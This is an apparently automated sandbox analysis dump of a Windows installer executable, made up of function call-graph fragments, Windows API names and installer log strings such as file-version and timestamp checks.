51733->51734 51734->51727 51736 41a27b 51737 41a2b3 CreateFontIndirectA 51736->51737 51737->51732 51739 44a92b 51738->51739 51740 44a9be 51739->51740 51741 44a93e 51739->51741 51742 44a9a7 51739->51742 51741->51740 51750 4034e0 18 API calls 51749->51750 51751 40352a 51750->51751 51751->51736 51754 464aff 51752->51754 51753 464bda 51763 4668a0 51753->51763 51754->51753 51757 464b4f 51754->51757 51776 421a2c 51754->51776 51758 464b94 51757->51758 51759 464b89 51757->51759 51762 464b92 51757->51762 51761 421a2c 21 API calls 51758->51761 51760 421a2c 21 API calls 51759->51760 51760->51762 51761->51762 51762->51753 51782 4185c8 21 API calls 51762->51782 51764 4668d0 51763->51764 51765 4668b1 51763->51765 51764->50733 51766 414b28 18 API calls 51765->51766 51767 4668bf 51766->51767 51768 414b28 18 API calls 51767->51768 51768->51764 51770 46a071 51769->51770 51771 421a2c 21 API calls 51770->51771 51772 46a0ca 51771->51772 51772->50759 51774 466374 32 API calls 51772->51774 51773->50736 51774->50759 51775->50760 51777 421a84 51776->51777 51778 421a3a 51776->51778 51777->51757 51781 421a69 51778->51781 51783 408cc4 51778->51783 51781->51777 51791 421d38 SetFocus GetFocus 51781->51791 51782->51753 51784 408cd0 51783->51784 51792 406df4 LoadStringA 51784->51792 51787 403450 18 API calls 51788 408d01 51787->51788 51789 403400 4 API calls 51788->51789 51790 408d16 51789->51790 51790->51781 51791->51777 51793 4034e0 18 API calls 51792->51793 51794 406e21 51793->51794 51794->51787 51796 46b929 51795->51796 51797 414af8 18 API calls 51796->51797 51807 46b976 51796->51807 51798 46b93f 51797->51798 51983 466138 20 API calls 51798->51983 51799 403420 4 API calls 51801 46ba20 51799->51801 51801->50774 51976 408be8 19 API calls 51801->51976 51802 46b947 51803 414b28 18 API calls 51802->51803 51804 46b955 51803->51804 51805 46b962 51804->51805 51808 46b97b 51804->51808 51984 47d6ec 56 API calls 51805->51984 51807->51799 51809 46b993 51808->51809 51810 46621c CharNextA 51808->51810 51985 47d6ec 56 API calls 51809->51985 51812 46b98f 51810->51812 51812->51809 51813 46b9a9 51812->51813 51814 46b9c5 51813->51814 51815 46b9af 51813->51815 51817 42c968 CharNextA 51814->51817 51986 47d6ec 56 API calls 51815->51986 51818 46b9d2 51817->51818 51818->51807 51987 4662a8 18 API calls 51818->51987 51820 46b9e9 51821 450ac8 18 API calls 51820->51821 51822 46b9f6 51821->51822 51988 47d6ec 56 API calls 51822->51988 51825 480c6f 51824->51825 51827 480c9d 51824->51827 51989 493350 32 API calls 51825->51989 51828 474b38 51827->51828 51990 457008 51828->51990 51831 4072b0 SetCurrentDirectoryA 51832 474b8e 51831->51832 52011 46d480 51832->52011 51977->50782 51983->51802 51984->51807 51985->51807 51986->51807 51987->51820 51988->51807 51989->51827 51991 457034 51990->51991 52006 45713c 51990->52006 52531 456d04 GetSystemTimeAsFileTime FileTimeToSystemTime 51991->52531 51992 45718d 51994 403400 4 API calls 51992->51994 51997 4571a2 51994->51997 51995 45703c 51998 4078fc 33 API calls 51995->51998 51997->51831 51999 4570ad 51998->51999 52532 456ff8 34 API calls 51999->52532 52001 457132 52534 456ff8 34 API calls 52001->52534 52002 457103 52002->52001 52008 403778 18 API calls 52002->52008 52003 403778 18 API calls 52005 4570b5 52003->52005 52005->52002 52005->52003 52007 456ff8 34 API calls 52005->52007 52006->51992 52535 456874 20 API calls 52006->52535 52007->52005 52009 45712a 52008->52009 52012 46d4f3 52011->52012 52014 46d49d 52011->52014 52015 46d4f8 52012->52015 52013 47838c 33 API calls 52013->52014 52014->52012 52014->52013 52016 46d51e 52015->52016 52531->51995 52532->52005 52534->52006 52535->51992 53723 431740 53684->53723 53686 403400 4 API calls 53687 43d2ca 53686->53687 53687->50841 53687->50842 53688 43d246 53688->53686 53690 43142a 53689->53690 53691 402648 18 API calls 53690->53691 53692 43145a 53691->53692 53693 492e5c 53692->53693 53694 492f31 53693->53694 53698 492e76 53693->53698 53700 492f74 53694->53700 53696 4335c0 18 API calls 53696->53698 53698->53694 53698->53696 53699 403450 18 API calls 53698->53699 53728 408c14 18 API calls 53698->53728 53729 4314f4 53698->53729 53699->53698 53701 492f90 53700->53701 53737 4335c0 53701->53737 53703 492f95 53704 4314f4 18 API calls 53703->53704 53705 492fa0 53704->53705 53706 43cde8 53705->53706 53707 43ce15 53706->53707 53712 43ce07 53706->53712 53707->50852 53708 43ce91 53716 43cf4b 53708->53716 53740 4468d8 53708->53740 53710 43cedc 53746 43d5a4 53710->53746 53712->53707 53712->53708 53713 4468d8 18 API calls 53712->53713 53713->53712 53714 43d151 53714->53707 53766 446878 18 API calls 53714->53766 53716->53714 53717 43d132 53716->53717 53764 446878 18 API calls 53716->53764 53765 446878 18 API calls 53717->53765 53720->50854 53721->50856 53722->50843 53724 403494 4 API calls 53723->53724 53727 43174f 53724->53727 53725 431779 53725->53688 53726 403744 18 API calls 53726->53727 53727->53725 53727->53726 53728->53698 53730 431502 53729->53730 53731 431514 53729->53731 53735 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53730->53735 53733 431536 53731->53733 53736 431494 18 API calls 53731->53736 53733->53698 53735->53731 53736->53733 53738 402648 18 API calls 53737->53738 53739 4335cf 53738->53739 53739->53703 53741 4468f7 53740->53741 53742 4468fe 53740->53742 53767 446684 18 API calls 53741->53767 53743 4314f4 18 API calls 53742->53743 53745 44690e 53743->53745 53745->53710 53747 43d5c0 53746->53747 53752 43d5ed 53746->53752 53748 402660 4 API calls 53747->53748 53747->53752 53748->53747 53749 43d622 53749->53716 53751 43f6f9 53751->53749 53772 446878 18 API calls 53751->53772 53752->53749 53752->53751 53754 43336c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53754 53755 43c18c 18 API calls 53752->53755 53756 446878 18 API calls 53752->53756 53760 43356c 18 API calls 53752->53760 53761 435ea4 18 API calls 53752->53761 53762 431494 18 API calls 53752->53762 53763 446684 18 API calls 53752->53763 53768 4366a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53768 53769 438f34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53769 53770 43d49c 32 API calls 53752->53770 53771 433588 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53771 53754->53752 53755->53752 53756->53752 53760->53752 53761->53752 53762->53752 53763->53752 53764->53716 53765->53714 53766->53714 53767->53742 53768->53752 53769->53752 53770->53752 53771->53752 53772->53751 53773 416b52 53774 416bfa 53773->53774 53775 416b6a 53773->53775 53792 41532c 18 API calls 53774->53792 53777 416b84 SendMessageA 53775->53777 53778 416b78 53775->53778 53779 416bd8 53777->53779 53780 416b82 CallWindowProcA 53778->53780 53781 416b9e 53778->53781 53780->53779 53789 41a068 GetSysColor 53781->53789 53784 416ba9 SetTextColor 53785 416bbe 53784->53785 53790 41a068 GetSysColor 53785->53790 53787 416bc3 SetBkColor 53791 41a6f0 GetSysColor CreateBrushIndirect 53787->53791 53789->53784 53790->53787 53791->53779 53792->53779 54251 40ce34 54254 406f18 WriteFile 54251->54254 54255 406f35 54254->54255 53793 416654 53794 416661 53793->53794 53795 4166bb 53793->53795 53800 416560 CreateWindowExA 53794->53800 53796 416668 SetPropA SetPropA 53796->53795 53797 41669b 53796->53797 53798 4166ae SetWindowPos 53797->53798 53798->53795 53800->53796 53801 490e9c 53802 490ed0 53801->53802 53803 490ed2 53802->53803 53804 490ee6 53802->53804 53937 4467f0 32 API calls 53803->53937 53807 490f22 53804->53807 53808 490ef5 53804->53808 53806 490edb Sleep 53910 490f59 53806->53910 53813 490f5e 53807->53813 53814 490f31 53807->53814 53809 44684c 32 API calls 53808->53809 53811 490f04 53809->53811 53810 403420 4 API calls 53812 491390 53810->53812 53815 490f0c FindWindowA 53811->53815 53819 490f6d 53813->53819 53820 490fb4 53813->53820 53816 44684c 32 API calls 53814->53816 53817 446acc 19 API calls 53815->53817 53818 490f3e 53816->53818 53919 490f1d 53817->53919 53821 490f46 FindWindowA 53818->53821 53938 4467f0 32 API calls 53819->53938 53825 491010 53820->53825 53826 490fc3 53820->53826 53823 446acc 19 API calls 53821->53823 53823->53910 53824 490f79 53939 4467f0 32 API calls 53824->53939 53832 49106c 53825->53832 53833 49101f 53825->53833 53942 4467f0 32 API calls 53826->53942 53829 490f86 53940 4467f0 32 API calls 53829->53940 53830 490fcf 53943 4467f0 32 API calls 53830->53943 53843 49107b 53832->53843 53844 4910a6 53832->53844 53947 4467f0 32 API calls 53833->53947 53835 490f93 53941 4467f0 32 API calls 53835->53941 53837 490fdc 53944 4467f0 32 API calls 53837->53944 53839 49102b 53948 4467f0 32 API calls 53839->53948 53841 490f9e SendMessageA 53842 446acc 19 API calls 53841->53842 53842->53919 53847 44684c 32 API calls 53843->53847 53854 4910b5 53844->53854 53855 4910f4 53844->53855 53846 490fe9 53945 4467f0 32 API calls 53846->53945 53850 491088 53847->53850 53848 491038 53949 4467f0 32 API calls 53848->53949 53857 491090 RegisterClipboardFormatA 53850->53857 53852 490ff4 PostMessageA 53946 446924 19 API calls 53852->53946 53853 491045 53950 4467f0 32 API calls 53853->53950 53952 4467f0 32 API calls 53854->53952 53863 491148 53855->53863 53864 491103 53855->53864 53860 446acc 19 API calls 53857->53860 53860->53910 53861 491050 SendNotifyMessageA 53951 446924 19 API calls 53861->53951 53862 4910c1 53953 4467f0 32 API calls 53862->53953 53872 49119c 53863->53872 53873 491157 53863->53873 53955 4467f0 32 API calls 53864->53955 53868 4910ce 53954 4467f0 32 API calls 53868->53954 53870 49110f 53956 4467f0 32 API calls 53870->53956 53871 4910d9 SendMessageA 53875 446acc 19 API calls 53871->53875 53882 4911ab 53872->53882 53883 4911fe 53872->53883 53959 4467f0 32 API calls 53873->53959 53875->53919 53877 49111c 53957 4467f0 32 API calls 53877->53957 53878 491163 53960 4467f0 32 API calls 53878->53960 53881 491127 PostMessageA 53958 446924 19 API calls 53881->53958 53884 44684c 32 API calls 53882->53884 53891 49120d 53883->53891 53892 491285 53883->53892 53887 4911b8 53884->53887 53885 491170 53961 4467f0 32 API calls 53885->53961 53889 42e2bc 2 API calls 53887->53889 53894 4911c5 53889->53894 53890 49117b SendNotifyMessageA 53962 446924 19 API calls 53890->53962 53893 44684c 32 API calls 53891->53893 53900 4912ba 53892->53900 53901 491294 53892->53901 53896 49121c 53893->53896 53897 4911db GetLastError 53894->53897 53898 4911cb 53894->53898 53963 4467f0 32 API calls 53896->53963 53902 446acc 19 API calls 53897->53902 53899 446acc 19 API calls 53898->53899 53903 4911d9 53899->53903 53911 4912c9 53900->53911 53912 4912ec 53900->53912 53968 4467f0 32 API calls 53901->53968 53902->53903 53907 446acc 19 API calls 53903->53907 53906 49129e FreeLibrary 53969 446924 19 API calls 53906->53969 53907->53910 53908 49122f GetProcAddress 53914 49123b 53908->53914 53915 491275 53908->53915 53910->53810 53913 44684c 32 API calls 53911->53913 53920 4912fb 53912->53920 53926 49132f 53912->53926 53916 4912d5 53913->53916 53964 4467f0 32 API calls 53914->53964 53967 446924 19 API calls 53915->53967 53922 4912dd CreateMutexA 53916->53922 53919->53910 53970 48b088 32 API calls 53920->53970 53921 491247 53965 4467f0 32 API calls 53921->53965 53922->53910 53925 491254 53929 446acc 19 API calls 53925->53929 53926->53910 53972 48b088 32 API calls 53926->53972 53928 491307 53930 491318 OemToCharBuffA 53928->53930 53931 491265 53929->53931 53971 48b0a0 19 API calls 53930->53971 53966 446924 19 API calls 53931->53966 53934 49134a 53935 49135b CharToOemBuffA 53934->53935 53973 48b0a0 19 API calls 53935->53973 53937->53806 53938->53824 53939->53829 53940->53835 53941->53841 53942->53830 53943->53837 53944->53846 53945->53852 53946->53919 53947->53839 53948->53848 53949->53853 53950->53861 53951->53910 53952->53862 53953->53868 53954->53871 53955->53870 53956->53877 53957->53881 53958->53919 53959->53878 53960->53885 53961->53890 53962->53910 53963->53908 53964->53921 53965->53925 53966->53919 53967->53919 53968->53906 53969->53910 53970->53928 53971->53910 53972->53934 53973->53910 53974 42e317 SetErrorMode 53975 42f394 53976 42f3a3 NtdllDefWindowProc_A 53975->53976 53977 42f39f 53975->53977 53976->53977 54256 4222f4 54257 422303 54256->54257 54262 421284 54257->54262 54260 422323 54263 4212f3 54262->54263 54265 421293 54262->54265 54267 421304 54263->54267 54287 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 54263->54287 54265->54263 54286 408d34 33 API calls 54265->54286 54266 421332 54268 42134d 54266->54268 54275 4213a5 54266->54275 54267->54266 54269 4213ca 54267->54269 54279 421370 GetMenu 54268->54279 54283 4213a3 54268->54283 54271 4213de SetMenu 54269->54271 54269->54283 54270 4213f6 54290 4211cc 24 API calls 54270->54290 54271->54283 54274 4213fd 54274->54260 54285 4221f8 10 API calls 54274->54285 54276 4213b9 54275->54276 54275->54283 54278 4213c2 SetMenu 54276->54278 54278->54283 54280 421393 54279->54280 54281 42137a 54279->54281 54288 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 54280->54288 54284 42138d SetMenu 54281->54284 54283->54270 54289 421e3c 25 API calls 54283->54289 54284->54280 54285->54260 54286->54265 54287->54267 54288->54283 54289->54270 54290->54274 54291 44acfc 54292 44ad0a 54291->54292 54294 44ad29 54291->54294 54293 44abe0 25 API calls 54292->54293 54292->54294 54293->54294 54295 447f7c 54296 447fb1 54295->54296 54310 447faa 54295->54310 54297 447fd0 54296->54297 54298 447fba 54296->54298 54301 403494 4 API calls 54297->54301 54341 447d80 21 API calls 54298->54341 54299 403400 4 API calls 54302 44815b 54299->54302 54304 447fde 54301->54304 54303 447fc5 54303->54297 54305 447fc9 54303->54305 54306 4037b8 18 API calls 54304->54306 54305->54310 54307 447ffa 54306->54307 54308 4037b8 18 API calls 54307->54308 54309 448016 54308->54309 54309->54310 54311 44802a 54309->54311 54310->54299 54312 4037b8 18 API calls 54311->54312 54313 448044 54312->54313 54314 431424 18 API calls 54313->54314 54315 448066 54314->54315 54316 4314f4 18 API calls 54315->54316 54321 448086 54315->54321 54316->54315 54317 4480dc 54330 441b88 54317->54330 54318 4480c4 54318->54317 54343 442e24 18 API calls 54318->54343 54321->54318 54342 442e24 18 API calls 54321->54342 54323 448110 GetLastError 54344 447d14 18 API calls 54323->54344 54325 44811f 54345 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54325->54345 54327 448134 54346 442e74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54327->54346 54329 44813c 54331 442b66 54330->54331 54332 441bc1 54330->54332 54333 403400 4 API calls 54331->54333 54334 403400 4 API calls 54332->54334 54335 442b7b 54333->54335 54336 441bc9 54334->54336 54335->54323 54337 431424 18 API calls 54336->54337 54339 441bd5 54337->54339 54338 442b56 54338->54323 54339->54338 54347 441260 18 API calls 54339->54347 54341->54303 54342->54321 54343->54317 54344->54325 54345->54327 54346->54329 54347->54339 54348 497270 54406 403344 54348->54406 54350 49727e 54409 4056a0 54350->54409 54352 497283 54412 406334 GetModuleHandleA GetProcAddress 54352->54412 54358 497292 54429 410964 54358->54429 54360 497297 54433 412938 54360->54433 54362 4972a1 54438 419050 GetVersion 54362->54438 54679 4032fc 54406->54679 54408 403349 GetModuleHandleA GetCommandLineA 54408->54350 54411 4056db 54409->54411 54680 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54409->54680 54411->54352 54413 406350 54412->54413 54414 406357 GetProcAddress 54412->54414 54413->54414 54415 406366 54414->54415 54416 40636d GetProcAddress 54414->54416 54415->54416 54417 406380 54416->54417 54418 40637c SetProcessDEPPolicy 54416->54418 54419 409954 54417->54419 54418->54417 54681 40902c 54419->54681 54424 408728 21 API calls 54425 409977 54424->54425 54696 409078 GetVersionExA 54425->54696 54428 409b88 6F571CD0 54428->54358 54430 41096e 54429->54430 54431 4109ad GetCurrentThreadId 54430->54431 54432 4109c8 54431->54432 54432->54360 54698 40af0c 54433->54698 54437 412964 54437->54362 54710 41de34 8 API calls 54438->54710 54679->54408 54680->54411 54682 408cc4 19 API calls 54681->54682 54683 40903d 54682->54683 54684 4085e4 GetSystemDefaultLCID 54683->54684 54686 40861a 54684->54686 54685 406df4 19 API calls 54685->54686 54686->54685 54687 408570 19 API calls 54686->54687 54688 403450 18 API calls 54686->54688 54691 40867c 54686->54691 54687->54686 54688->54686 54689 406df4 19 API calls 54689->54691 54690 408570 19 API calls 54690->54691 54691->54689 54691->54690 54692 403450 18 API calls 54691->54692 54693 4086ff 54691->54693 54692->54691 54694 403420 4 API calls 54693->54694 54695 408719 54694->54695 54695->54424 54697 40908f 54696->54697 54697->54428 54700 40af13 54698->54700 54699 40af32 54702 41101c 54699->54702 54700->54699 54709 40ae44 33 API calls 54700->54709 54703 41103e 54702->54703 54704 406df4 19 API calls 54703->54704 54705 403450 18 API calls 54703->54705 54706 41105d 54703->54706 54704->54703 54705->54703 54707 403400 4 API calls 54706->54707 54708 411072 54707->54708 54708->54437 54709->54700 53978 4162da 53979 4162e6 GetClassInfoA 53978->53979 53980 416306 53978->53980 53979->53980 53981 4162fa GetClassInfoA 53979->53981 53981->53980 56014 47f1bc 56015 47f1c5 56014->56015 56017 47f1f0 56014->56017 56015->56017 56018 47f1e2 56015->56018 56016 47f22f 56020 47f242 56016->56020 56021 47f24f 56016->56021 56017->56016 56411 47dbc0 18 API calls 56017->56411 56409 47586c 202 API calls 56018->56409 56027 47f246 56020->56027 56028 47f284 56020->56028 56024 47f269 56021->56024 56025 47f258 56021->56025 56023 47f1e7 56023->56017 56410 408be8 19 API calls 56023->56410 56414 47ddcc 56 API calls 56024->56414 56413 47dd5c 56 API calls 56025->56413 56026 47f222 56412 47dd5c 56 API calls 56026->56412 56029 47f24a 56027->56029 56035 47f2c7 56027->56035 56036 47f2e2 56027->56036 56032 47f28d 56028->56032 56033 47f2a8 56028->56033 56042 47f30b 56029->56042 56043 47f329 56029->56043 56415 47ddcc 56 API calls 56032->56415 56416 47ddcc 56 API calls 56033->56416 56417 47ddcc 56 API calls 56035->56417 56418 47ddcc 56 API calls 56036->56418 56044 47f320 56042->56044 56419 47dd5c 56 API calls 56042->56419 56421 47da58 38 API calls 56043->56421 56420 47da58 38 API calls 56044->56420 56048 47f33f 56051 47f33d 56048->56051 56052 47dd38 56 API calls 56048->56052 56049 47f339 56049->56051 56054 47dd38 56 API calls 56049->56054 56050 47f327 56050->56048 56050->56049 56148 47b338 56051->56148 56052->56051 56054->56051 56149 42d864 GetWindowsDirectoryA 56148->56149 56150 47b356 56149->56150 56151 403450 18 API calls 56150->56151 56152 47b363 56151->56152 56153 42d890 GetSystemDirectoryA 56152->56153 56154 47b36b 56153->56154 56155 403450 18 API calls 56154->56155 56156 47b378 56155->56156 56157 42d8bc 6 API calls 56156->56157 56158 47b380 56157->56158 56159 403450 18 API calls 56158->56159 56160 47b38d 56159->56160 56161 47b396 56160->56161 56162 47b3b2 56160->56162 56452 42d1d4 56161->56452 56164 403400 4 API calls 56162->56164 56166 47b3b0 56164->56166 56167 47b3f7 56166->56167 56169 42c898 19 API calls 56166->56169 56432 47b1c0 56167->56432 56168 403450 18 API calls 56168->56166 56171 47b3d2 56169->56171 56173 403450 18 API calls 56171->56173 56175 47b3df 56173->56175 56174 403450 18 API calls 56176 47b413 56174->56176 56175->56167 56178 403450 18 API calls 56175->56178 56177 47b431 56176->56177 56179 4035c0 18 API calls 56176->56179 56180 47b1c0 22 API calls 56177->56180 56178->56167 56179->56177 56181 47b440 56180->56181 56182 403450 18 API calls 56181->56182 56183 47b44d 56182->56183 56184 47b475 56183->56184 56185 42c40c 19 API calls 56183->56185 56186 47b4dc 56184->56186 56190 47b1c0 22 API calls 56184->56190 56187 47b463 56185->56187 56188 47b506 56186->56188 56189 47b4e5 56186->56189 56191 4035c0 18 API calls 56187->56191 56194 42c40c 19 API calls 56188->56194 56192 42c40c 19 API calls 56189->56192 56193 47b48d 56190->56193 56191->56184 56195 47b4f2 56192->56195 56196 403450 18 API calls 56193->56196 56197 47b513 56194->56197 56198 4035c0 18 API calls 56195->56198 56199 47b49a 56196->56199 56200 4035c0 18 API calls 56197->56200 56202 47b4ad 56199->56202 56460 4529b4 18 API calls 56199->56460 56409->56023 56411->56026 56412->56016 56413->56029 56414->56029 56415->56029 56416->56029 56417->56029 56418->56029 56419->56044 56420->56050 56421->56050 56433 42dd44 RegOpenKeyExA 56432->56433 56434 47b1e6 56433->56434 56435 47b20c 56434->56435 56436 47b1ea 56434->56436 56438 403400 4 API calls 56435->56438 56437 42dc74 20 API calls 56436->56437 56441 47b1f6 56437->56441 56439 47b213 56438->56439 56439->56174 56440 47b201 RegCloseKey 56440->56439 56441->56440 56442 403400 4 API calls 56441->56442 56442->56440 56453 4038a4 18 API calls 56452->56453 56454 42d1e7 56453->56454 56455 42d1fe GetEnvironmentVariableA 56454->56455 56459 42d211 56454->56459 56462 42daf8 18 API calls 56454->56462 56455->56454 56456 42d20a 56455->56456 56457 403400 4 API calls 56456->56457 56457->56459 56459->56168 56460->56202 56462->56454 57931 40d07c 57932 40d084 57931->57932 57933 40d0ae 57932->57933 57934 40d0b2 57932->57934 57935 40d0a7 57932->57935 57937 40d0b6 57934->57937 57938 40d0c8 57934->57938 57944 4062a0 GlobalHandle GlobalUnWire GlobalFree 57935->57944 57943 406274 GlobalAlloc GlobalFix 57937->57943 57945 406284 GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 57938->57945 57941 40d0c4 57941->57933 57942 408cc4 19 API calls 57941->57942 57942->57933 57943->57941 57944->57933 57945->57941 57946 4165fc 73A25CF0

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0046F7F0 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 956COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FFDE
                                                                                                                                                          • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FE0C
                                                                                                                                                          • User opted not to overwrite the existing file. Skipping., xrefs: 0046FF95
                                                                                                                                                          • Dest file is protected by Windows File Protection., xrefs: 0046FA35
                                                                                                                                                          • Incrementing shared file count (32-bit)., xrefs: 004706C6
                                                                                                                                                          • InUn, xrefs: 0047028D
                                                                                                                                                          • Time stamp of existing file: (failed to read), xrefs: 0046FB7F
                                                                                                                                                          • Couldn't read time stamp. Skipping., xrefs: 0046FE7D
                                                                                                                                                          • Installing the file., xrefs: 00470051
                                                                                                                                                          • Non-default bitness: 32-bit, xrefs: 0046FA03
                                                                                                                                                          • Version of our file: %u.%u.%u.%u, xrefs: 0046FC38
                                                                                                                                                          • Non-default bitness: 64-bit, xrefs: 0046F9F7
                                                                                                                                                          • Time stamp of existing file: %s, xrefs: 0046FB73
                                                                                                                                                          • Existing file is a newer version. Skipping., xrefs: 0046FD4A
                                                                                                                                                          • Will register the file (a type library) later., xrefs: 00470634
                                                                                                                                                          • .tmp, xrefs: 004700FF
                                                                                                                                                          • Dest file exists., xrefs: 0046FB03
                                                                                                                                                          • Time stamp of our file: %s, xrefs: 0046FAE3
                                                                                                                                                          • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FE18
                                                                                                                                                          • Version of existing file: (none), xrefs: 0046FE42
                                                                                                                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470042
                                                                                                                                                          • Failed to strip read-only attribute., xrefs: 0047001B
                                                                                                                                                          • Installing into GAC, xrefs: 00470835
                                                                                                                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0046FCC4
                                                                                                                                                          • Version of our file: (none), xrefs: 0046FC44
                                                                                                                                                          • Time stamp of our file: (failed to read), xrefs: 0046FAEF
                                                                                                                                                          • Stripped read-only attribute., xrefs: 0047000F
                                                                                                                                                          • Will register the file (a DLL/OCX) later., xrefs: 00470640
                                                                                                                                                          • Dest filename: %s, xrefs: 0046F9DC
                                                                                                                                                          • , xrefs: 0046FD17, 0046FEE8, 0046FF66
                                                                                                                                                          • Same version. Skipping., xrefs: 0046FE2D
                                                                                                                                                          • Existing file has a later time stamp. Skipping., xrefs: 0046FF17
                                                                                                                                                          • -- File entry --, xrefs: 0046F843
                                                                                                                                                          • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FDFD
                                                                                                                                                          • @, xrefs: 0046F8F8
                                                                                                                                                          • Incrementing shared file count (64-bit)., xrefs: 004706AD
                                                                                                                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FF34
                                                                                                                                                          • Uninstaller requires administrator: %s, xrefs: 004702BD
                                                                                                                                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046FB16
                                                                                                                                                          • Same time stamp. Skipping., xrefs: 0046FE9D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                                                                          • API String ID: 0-4021121268
                                                                                                                                                          • Opcode ID: d0b5c9680b511a15ce8a8888be78a2c607874e5c32b26c092d6d1703eba18a82
                                                                                                                                                          • Instruction ID: e8792a80d11ba53c366901de372cfc6d7401bc2553ef03097421f90694f1f82e
                                                                                                                                                          • Opcode Fuzzy Hash: d0b5c9680b511a15ce8a8888be78a2c607874e5c32b26c092d6d1703eba18a82
                                                                                                                                                          • Instruction Fuzzy Hash: 19927230A04248DFCB11DFA5D445BDDBBB5AF05308F5480ABE848BB392D7789E49CB5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042DFC4 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1535 42dfc4-42dfd5 1536 42dfe0-42e005 AllocateAndInitializeSid 1535->1536 1537 42dfd7-42dfdb 1535->1537 1538 42e1af-42e1b7 1536->1538 1539 42e00b-42e028 GetVersion 1536->1539 1537->1538 1540 42e041-42e043 1539->1540 1541 42e02a-42e03f GetModuleHandleA GetProcAddress 1539->1541 1542 42e045-42e053 CheckTokenMembership 1540->1542 1543 42e06a-42e084 GetCurrentThread OpenThreadToken 1540->1543 1541->1540 1544 42e191-42e1a7 FreeSid 1542->1544 1545 42e059-42e065 1542->1545 1546 42e086-42e090 GetLastError 1543->1546 1547 42e0bb-42e0e3 GetTokenInformation 1543->1547 1545->1544 1548 42e092-42e097 call 4031bc 1546->1548 1549 42e09c-42e0af GetCurrentProcess OpenProcessToken 1546->1549 1550 42e0e5-42e0ed GetLastError 1547->1550 1551 42e0fe-42e122 call 402648 GetTokenInformation 1547->1551 1548->1538 1549->1547 1554 42e0b1-42e0b6 call 4031bc 1549->1554 1550->1551 1555 42e0ef-42e0f9 call 4031bc * 2 1550->1555 1560 42e130-42e138 1551->1560 1561 42e124-42e12e call 4031bc * 2 1551->1561 1554->1538 1555->1538 1566 42e13a-42e13b 1560->1566 1567 42e16b-42e189 call 402660 CloseHandle 1560->1567 1561->1538 1571 42e13d-42e150 EqualSid 1566->1571 1567->1544 1574 42e152-42e15f 1571->1574 1575 42e167-42e169 1571->1575 1574->1575 1577 42e161-42e165 1574->1577 1575->1567 1575->1571 1577->1567
                                                                                                                                                          APIs
                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                                                                                                          • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
